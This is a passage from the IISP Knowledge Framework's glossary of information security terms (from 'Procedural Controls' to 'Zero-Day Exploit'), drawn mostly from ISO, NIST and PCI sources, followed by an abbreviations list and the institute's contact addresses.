Security procedures or guidelines. As opposed to other controls, procedural
Controls controls rely on users to follow rules or performs certain steps that
are not necessarily enforced by technical or physical means. Also
known as administrative controls.
Procedure Specified way to carry out an activity or a process ISO 9000:2015
Process Set of interrelated or interacting activities which transforms inputs ISO 9000:2015
into outputs.
Protection Implementation-independent statement of security needs for a TOE ISO/IEC 15408
Profile type
Protective A set of processes and technologies aimed at improving risk profiles
Monitoring and reducing risk. Protective Monitoring provides essential
oversight of IT systems across the whole enterprise. Protective
Monitoring includes efficient, automatic monitoring, alerting and
reporting of system changes, significant system events and file
integrity monitoring. In order to implement protective monitoring
investment in a SIEM product is usually required.
Proxy Server A server that services the requests of its clients by forwarding those NISTIR 7298
requests to other servers.
IISP Knowledge Framework Version 1.0 August 2017 Page 169 of 195
Term Definition Source
Ransomware Malware that restricts access to the compromised systems until a
ransom demand is satisfied. You may be warned that you need to
pay money, complete surveys, or perform other actions before you
can use your PC again. Some forms of ransomware may encrypt files
on the system's hard drive, while others may simply lock the system
and display messages to coax the user into paying.
Some types of ransomware also prevent restoration of data from
incremental backups by deleting or corrupting the checkpoint data.
Regulation A rule or directive made and maintained by an authority. Oxford English
Dictionary
Regulation of The Regulation of Investigatory Powers Act 2000 (RIPA) is an Act of
Investigatory the Parliament of the UK, regulating the powers of public bodies to
Powers Act carry out surveillance and investigation, and covering the
interception of communications.
Release The process of managing, planning, scheduling and controlling a
Management software build through different stages and environments; including
testing and deploying software releases.
Reliability Property of consistent intended behaviour and results ISO/IEC 27000:2016
Remediation A plan of actions on how risks, usually found during a vulnerability
Action Plan assessment or penetration test, are to be addressed. Also known as
a Risk Treatment Plan (RTP).
Remote Access Process of accessing network resources from another network, or ISO/IEC 27033-1:2009
from a terminal device which is not permanently connected,
physically or logically, to the network it is accessing.
Reputation The beliefs or opinions that are generally held about someone or Oxford English
something. Dictionary
Residual Risk Risk remaining after risk treatment. ISO/IEC 27000:2016
Retention A document listing all the titles of each document or record will be
Schedule retained as an active record, the period of retention, when the
retention period starts and the reason for its retention
(administrative, legal, fiscal, and historical). A clearly defined plan
for a record retention and disposal is a vital component of a records
management program.
Review, A Review, Retention and Disposal (RRD) policy defines what an
Retention and organisation should do in terms retaining or disposing (i.e.
Disposal destroying) information – including personal data. This is in order to
be compliant with various legislation in terms of retaining
information (e.g. Companies Act for finance and accounting records)
and not retaining personal data for longer than necessary to be
compliant with principle 5 of the Data Protection Act.
The implementation of this policy is usually expressed with a
retention schedule.
Risk Effect of uncertainty on objectives. ISO/IEC 27000:2016
Risk Acceptance Informed decision to take a particular risk. ISO/IEC 27000:2016
Risk Analysis Process to comprehend the nature of risk and to determine the ISO/IEC 27005:2011
level of risk.
Risk Appetite Amount and type of risk that an organization is willing to pursue or ISO Guide 73:2009
retain.
Risk The overall process of risk identification, risk analysis and risk ISO/IEC 27005:2011
Assessment evaluation
Risk Avoidance Informed decision not to be involved in, or to withdraw from, an ISO Guide 73:2009
activity in order not to be exposed to a particular risk.
IISP Knowledge Framework Version 1.0 August 2017 Page 170 of 195
Term Definition Source
Risk Criteria Terms of reference against which the significance of a risk is ISO/IEC 27005:2011
evaluated.
Risk Evaluation Process of comparing the results of risk analysis with risk criteria to ISO/IEC 27005:2011
determine whether the risk and/or its magnitude is acceptable or
tolerable.
Risk Process of finding, recognizing and describing risks ISO/IEC 27005:2011
Identification
Risk IT Risk IT provides an end-to-end, comprehensive view of all risks
related to the use of IT and a similarly thorough treatment of risk
management. It is aligned with COBIT.
Risk Coordinated activities to direct and control an organization with ISO/IEC 27005:2011
Management regard to risk.
Risk Systematic application of management policies, procedures and ISO/IEC 27000:2016
Management practices to the activities of communicating, consulting, establishing
Process the context and identifying, analysing, evaluating, treating,
monitoring and reviewing risk
Risk A methodology that provides a systematic approach to performing
Management risk assessment and then undertaking risk treatment.
Methodology
Risk The level of risk should be managed by introducing, removing or ISO/IEC 27005:2011
Modification altering controls so that the residual risk can be reassessed as being
acceptable.
Risk Owner Person or entity with the accountability and authority to manage a ISO/IEC 27000:2016
risk
Risk Retention Acceptance of the potential benefit of gain, or burden of loss, from ISO Guide 73:2009
a particular risk.
Risk Sharing Form of risk treatment involving the agreed distribution of risk with ISO Guide 73:2009
other parties.
Risk Tolerance Organization's or stakeholder's readiness to bear the risk after risk ISO Guide 73:2009
treatment in order to achieve its objectives.
Risk Treatment Process to modify risk. ISO/IEC 27005:2011
Risk Treatment A plan of actions on how risks, usually found during a vulnerability
Plan assessment or penetration test, are to be addressed. Also known as
a Remediation Action Plan (RAP).
Role Based Role-based access control (RBAC) is a method of controlled access
Access Control to data or applications based on the roles of individual users within
an enterprise.
Rootkit A set of tools used by an attacker after gaining root-level access to a NISTIR 7298
host to conceal the attacker’s activities on the host and permit the
attacker to maintain root-level access to the host through covert
means.
S/MIME Secure Multi-Purpose Internet Mail Extensions is a secure method
of sending e-mail. S/MIME is included in the latest versions of the
Web browsers from Microsoft and Netscape
SABSA SABSA is a proven framework and methodology used successfully
around the globe to meet a wide variety of Enterprise needs
including Risk Management, Information Assurance, Governance,
and Continuity Management.
IISP Knowledge Framework Version 1.0 August 2017 Page 171 of 195
Term Definition Source
Salt A non-secret value that is used in a cryptographic process, usually to NISTIR 7298
ensure that the results of computations for one instance cannot be
reused by an Attacker.
A salt is random data that is used as an additional input to a one-
way function that "hashes" a password or passphrase. The primary
function of salts is to defend against dictionary attacks or against its
hashed equivalent, a pre-computed rainbow table attack.
Sarbanes-Oxley The Sarbanes-Oxley Act of 2002 (SOX) is legislation passed by the
Act U.S. Congress to protect shareholders and the general public from
accounting errors and fraudulent practices in the enterprise, as well
as improve the accuracy of corporate disclosures.
Screened Sub- A host or network segment inserted as a “neutral zone” between an
net organisation’s private network and the Internet. Also known as a
DMZ (Demilitarized Zone).
Secure Coding The practice of developing computer software in a way that guards
against the accidental introduction of vulnerabilities. Defects, bugs
and logic flaws are consistently the primary cause of commonly
exploited software vulnerabilities.
Secure Also known as hardening.
Configuration
Secure Sockets Secure Sockets Layer (SSL) is a security technology for establishing
Layer an authenticated and encrypted link between a server and a
client—typically a web server and a browser, or a mail server and a
mail client. Now overtaken by Transport Layer Security.
Secure the A security design principle. Usually attackers go after the weakest
Weakest Link point in a system. When it comes to secure design, consider the
weakest links in a system and ensure that they are secure enough.
Security Security Assertion Markup Language (SAML) is an XML-based, open-
Assertion standard data format for exchanging authentication and
Markup authorisation data between parties. Can be used to support identity
Language federation
Security The knowledge and attitude members of an organisation possess
Awareness regarding the protection of the assets of that organisation including
physical and information assets.
Security Culture Describes the kind of behaviours organisations would like to see in
their employees, in areas like cybersecurity, physical security and
personnel security.
Security Design A set of principles using in designing a system or coding an
Principles application or services
Security The Security Development Lifecycle (SDL or SDLC) is a software
Development development process that helps developers build more secure
Lifecycle software from its inception all the way to its decommission.
Security A set of subjects, their information objects, and a common security NISTIR 7298
Domain policy.
A collection of entities to which applies a single security policy
executed by a single authority.
A domain that implements a security policy and is administered by
a single authority.
Security Security information and event management (SIEM) software
Information products and services combine security information management
and Event (SIM) and security event management (SEM). They provide real-
Management time analysis of security alerts generated by network hardware and
applications.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 172 of 195
Term Definition Source
Security A set of security procedures that are usually used to implement a
Operating particular policy.
Procedures
Security A SOC is a centralised unit that deals with security issues on an
Operations organisational and technical level. It is deployed to monitor, detect
Centre and handle security incidents.
Security Policy SPF. Describes the principles and approaches that HMG applies to
Framework protect its assets, be they people, infrastructure or information,
whilst at the same time assisting in the delivery of public services.
Security Target Implementation-dependent statement of security needs for a ISO/IEC 15408
specific identified TOE.
Sensitive Security-related information (including but not limited to card PCI DSS
Authentication verification value (CVV), full track data (from the magnetic stripe or
Data equivalent on a chip), PINs, and PIN blocks) used to authenticate
cardholders and/or authorize payment card transactions.
Sensitive In this Act “sensitive personal data” means personal data consisting Data Protection Act
Personal Data of information as to—
(a) the racial or ethnic origin of the data subject,
(b) his political opinions,
(c) his religious beliefs or other beliefs of a similar nature,
(d) whether he is a member of a trade union (within the meaning of
the Trade Union and Labour Relations (Consolidation) Act 1992),
(e) his physical or mental health or condition,
(f) his sexual life,
(g) the commission or alleged commission by him of any offence, or
(h) any proceedings for any offence committed or alleged to have
been committed by him, the disposal of such proceedings or the
sentence of any court in such proceedings.
Separation of Separation of Duties (SoD) is the concept of having more than one
Duties person required to complete a task. In business the separation by
sharing of more than one individual in one single task is an internal
control intended to prevent fraud and error. Also known as
"Segregation of Duties” Related to this concept is the Two Person
Rule. This requires two persons to complete a particular function,
for instance to logon to an administrative account.
Shared A shared responsibility model is a cloud security framework that
Responsibility dictates the security obligations of a Cloud Provider and the
Model consumer of its services.
Shoulder A type of social engineering technique used to obtain information
Surfing such as personal identification number, password and other
confidential data by looking over the victim's shoulder.
Simple Object Simple Object Access Protocol (SOAP) is a messaging protocol that
Access Protocol allows programs that run on disparate operating systems to
communicate using HTTP and the eXtensible Markup Language
(XML).
Single Sign-On Single Sign-On (SSO) is when a user logs in to one client and is then
signed in to other clients automatically, regardless of the platform,
technology, or domain the user is using.
Situational Within a volume of time and space, the perception of an NISTIR 7298
Awareness enterprise’s security posture and its threat environment; the
comprehension/meaning of both taken together (risk); and the
projection of their status into the near future.
IISP Knowledge Framework Version 1.0 August 2017 Page 173 of 195
Term Definition Source
Social A general term for attackers trying to trick people into revealing NISTIR 7298
Engineering sensitive information or performing certain actions, such as
downloading and executing files that appear to be benign but are
actually malicious
Software as a The capability provided to the consumer is to use the provider’s NIST_SP_800_145
Service applications running on a cloud infrastructure. The applications are
accessible from various client devices through either a thin client
interface, such as a web browser (e.g., web-based email), or a
program interface. The consumer does not manage or control the
underlying cloud infrastructure including network, servers,
operating systems, storage, or even individual application
capabilities, with the possible exception of limited user-specific
application configuration settings.
Software Software-defined networking (SDN) is a term used to describe
Defined network technology that is aimed at making the network as agile
Networking and flexible as the virtualized server and storage infrastructure of
the modern data centre, typically providing cloud services.
Source A process that provides assurance of the source of information. NIST SP 800-175B
Authentication
See also Authenticity.
Spam Unsolicited e-mails, which can carry malicious contents and/or scam ISO/IEC 27033-1:2009
messages.
Span Port The ability to copy traffic from any or all traffic ports to a single
unused port on a network switch. Also called port mirroring.
Spear Phishing Occurs when attackers obtain information about an individual (e.g.
from websites or social networking sites), and customise a phishing
attack against that individual.
Spoofing Impersonating a legitimate resource or user ISO/IEC 27033-1:2009
Spyware Software that is secretly or surreptitiously installed into an NISTIR 7298
information system to gather information on individuals or
organizations without their knowledge; a type of malicious code.
SQL Injection A type of code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an
entry field for execution.
SSL Accelerator A device that uses separate hardware to perform processor-
intensive cryptographic operations for Transport Layer Security
(TLS) and its predecessor Secure Sockets Layer (SSL).
Standard A required or accepted level of quality or achievement. Oxford English
Dictionary
Stateful Packet A firewall technology that monitors the state of active connections
Filtering and uses this information to determine which IP packets to allow
through the firewall.
Stateless Packet Looks at each IP packet in isolation and makes decisions about
Filtering whether it be allowed through purely by inspecting the header
information in the IP packet. Stateless packet filtering is usefully
performed by network routers. Firewall technology tends to use
stateful packet filtering.
Statement of The SoA is one of the key documents in an ISO/IEC 27001 ISMS. It
Applicability identifies the controls relevant to an organisation and explains why
those controls have been selected to treat the identified risks.
IISP Knowledge Framework Version 1.0 August 2017 Page 174 of 195
Term Definition Source
Static Code A method of program debugging that is done by examining the code
Analysis without executing the program. The process provides an
understanding of the code structure, and can help to ensure that
the code adheres to industry standards. Automated tools can assist
programmers and developers in carrying out static analysis.
Strategy A plan designed to achieve a particular long-term overall aim. Oxford English
Dictionary
STRIDE STRIDE is a system developed by Microsoft for performing threat
modelling.
Strong A user password that is complex with a combination of uppercase,
Password lowercase, numbers and special characters. That is a password with
good password strength.
Subject Generally an individual, process, or device causing information to NISTIR 7298
flow among objects or changes to the system state
IISP Knowledge Framework Version 1.0 August 2017 Page 175 of 195
Term Definition Source
Threat Evidence-based knowledge, including context, mechanisms,
Intelligence indicators, implications and actionable advice, about an existing or
emerging menace or hazard to assets that can be used to inform
decisions regarding the subject’s response to that menace or
hazard.
Threat A process by which potential threats can be identified, enumerated,
Modelling and prioritised – all from a hypothetical attacker’s point of view. The
purpose of threat modelling is to provide defenders with a
systematic analysis of the probable attacker’s profile, the most likely
attack vectors, and the assets most desired by an attacker.
Threat Scenario A set of discrete threat events, attributed to a specific threat source NIST SP 800-30
or multiple threat sources, ordered in time, that result in adverse
effects.
Threat Source The intent and method targeted at the intentional exploitation of a NISTIR 7298
vulnerability or a situation and method that may accidentally trigger
a vulnerability. Synonymous with Threat Agent.
Tigerscheme Tigerscheme is a commercial certification scheme for technical
security specialists, backed by University standards and covering a
wide range of expertise.
Transport Layer Transport Layer Security (TLS) and its predecessor, Secure Sockets
Security Layer (SSL), both frequently referred to as "SSL", are cryptographic
protocols that provide communications security over a computer
network. It enables confidentiality, integrity and source
authentication protection for the data that's transmitted between
different nodes. Used for establishing an encrypted link between a
server and a client—typically a web server and a browser, or a mail
server and a mail client.
Trojan Horse A computer program that appears to have a useful function, but NISTIR 7298
also has a hidden and potentially malicious function that evades
security mechanisms, sometimes by exploiting legitimate
authorizations of a system entity that invokes the program.
Trustworthy A UK not-for-profit organisation, with stated aim of improving
Software software. As taken from the web site “The Trustworthy Software
Foundation Foundation (TSFdn) aims to collect, organise and share the wealth of
knowledge, experience and capabilities that already exist in the UK
public and private sectors and in academia about trustworthy
software to give people a joined-up, curated view of the information
that is available”.
User The process of validating a supplied user identity.
Authentication
Virtual LAN Logical segmentation of a LAN into different broadcast domains. A
Virtual LAN (VLAN) is set up by configuring ports on a network
switch, so devices attached to these ports may communicate as if
they were attached to the same physical network segment,
although the devices are located on different LAN segments. A VLAN
is based on logical rather than physical connections.
IISP Knowledge Framework Version 1.0 August 2017 Page 176 of 195
Term Definition Source
Virtual Private A VPN is a private network which is implemented by using the ISO/IEC 27033-1:2009
Network infrastructure of existing networks. From a user perspective a VPN
behaves like a private network, and offers similar functionality and
services. A VPN can be used in various situations, such as to:
• Implement remote access to an organization from mobile or
off-site employees,
• Link different locations of an organization together, including
redundant links to implement a fall-back infrastructure,
• Set up connections to an organization’s network for other
organizations/business partners.
Virus Computer program that self-replicates and automatically spreads
between systems. A form of malware.
Virus Signature A virus signature is the fingerprint of a virus. It is a set of unique
data, or bits of code, that allow it to be identified. Antivirus
software uses a virus signature to find a virus in a computer file
system, allowing to detect, quarantine and remove the virus.
Vulnerability Weakness of an asset or control that can be exploited by one or ISO/IEC 27000:2016
more threats
Vulnerability Vulnerability assessment is the process of identifying vulnerabilities
Assessment within a system. This could be a software system, a physical system
or even a mechanical system, and the testing can be targeted to
focus on components that might be technical, physical or even
administrative in their nature. Typically a vulnerability assessment
does not try and break into a system – unlike penetration testing.
Vulnerability assessment is where tools are used to scan a system or
network for a list of known vulnerabilities, such as system
misconfiguration, outdated software, or a lack of patching.
Vulnerability The practice of identifying, classifying and mitigating vulnerabilities.
Management Vulnerabilities can be from vulnerabilities assessments, external
sources or from threat intelligence.
Warning, Warning, Advice and Reporting Point (WARP) is a community or
Advice and internal company-based service to share advice and information on
Reporting Point computer-based threats and vulnerabilities.
Web A firewall that monitors, filters or blocks the HTTP traffic to and
Application from a Web application. They typically reside on a server.
Firewall
Web Filtering A program or device that screens an incoming web page and
restricts or controls its content.
White Box White box testing is when information about the organisation’s
Testing application, infrastructure or network is provided to the tester. The
tester performs the test with full knowledge of the infrastructure,
defence mechanisms and communication channels of the target
organisation.
Whitelist A list of people or things considered to be acceptable or Oxford English
trustworthy. Dictionary
Worm A computer worm is a standalone malware computer program that
replicates itself in order to spread to other computers. Often, it uses
a computer network to spread itself, relying on security failures on
the target computer to access it. Unlike a computer virus, it does
not need to attach itself to an existing program.
WS-Security An extension to SOAP to apply security to Web services. It was
published by OASIS.
IISP Knowledge Framework Version 1.0 August 2017 Page 177 of 195
Term Definition Source
Zero-Day A ‘zero-day’ is a vulnerability which is not publicly known and has
Exploit not been patched by the software developer. The exploit is how a
zero-day vulnerability is leveraged.
IISP Knowledge Framework Version 1.0 August 2017 Page 178 of 195
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 179 of 195
5. Abbreviations and Acronyms
3DES Triple DES
AH Authentication Header
AV Antivirus
BCS The Chartered Institute for IT. (Formerly known as the British Computer
Society)
IISP Knowledge Framework Version 1.0 August 2017 Page 180 of 195
CA Certificate Authority
Certification Authority
CC Common Criteria
CI Configuration Item
IISP Knowledge Framework Version 1.0 August 2017 Page 181 of 195
CISSP Certified Information Systems Security Professional
IISP Knowledge Framework Version 1.0 August 2017 Page 182 of 195
CVSS Common Vulnerability Scoring System
DH Diffie-Hellman
DR Disaster Recovery
EA Enterprise Architecture
IISP Knowledge Framework Version 1.0 August 2017 Page 183 of 195
EAL Evaluation Assurance Level
EE End Entity
HR Human Resource
IISP Knowledge Framework Version 1.0 August 2017 Page 184 of 195
HRA Human Rights Act
IISP Knowledge Framework Version 1.0 August 2017 Page 185 of 195
IPC Investigatory Powers Commission
IISP Knowledge Framework Version 1.0 August 2017 Page 186 of 195
MIB Management Information Base
MITM Man-in-the-Middle
IISP Knowledge Framework Version 1.0 August 2017 Page 187 of 195
NVLAP National Voluntary Laboratory Accreditation Program
PHP Originally stood for Personal Home Page it now stands for PHP: Hypertext
Preprocessor
IISP Knowledge Framework Version 1.0 August 2017 Page 188 of 195
PLC Programmable Logic Controller
RA Registration Authority
RSA Rivest-Shamir-Adleman
SA Security Architect
Security Association
IISP Knowledge Framework Version 1.0 August 2017 Page 189 of 195
SASL Simple Authentication and Security Layer
IISP Knowledge Framework Version 1.0 August 2017 Page 190 of 195
SSE-CMM Systems Security Engineering Capability Maturity Model
ST Security Target
TCP/IP Transmission Control Protocol (TCP) and the Internet Protocol (IP)
VA Validation Authority
VM Virtual Machine
IISP Knowledge Framework Version 1.0 August 2017 Page 191 of 195
WARP Warning, Advice and Reporting Point
IISP Knowledge Framework Version 1.0 August 2017 Page 192 of 195
6. Skill Areas to Knowledge Areas
On the following page is a mind map containing a mapping from the IISP Skill Areas to the various
Knowledge Areas and sub areas. You will notice that many of the IISP Skill Areas to more than one
Knowledge Area.
A separate png file of the mind map is available.
IISP Knowledge Framework Version 1.0 August 2017 Page 193 of 195
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®, IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are
trademarks owned by The Institute of Information Security Professionals and may be used only with express permission of the Institute.
IISP Knowledge Framework Version 1.0 August 2017 Page 194 of 195
Evesham & Postal Office
Basepoint Business Centre
Crab Apple Way
Evesham
Worcestershire
WR11 1GP
London Office
CAN Mezzanine
32-36 Loman Street
London
SE1 0EH
Website: www.iisp.org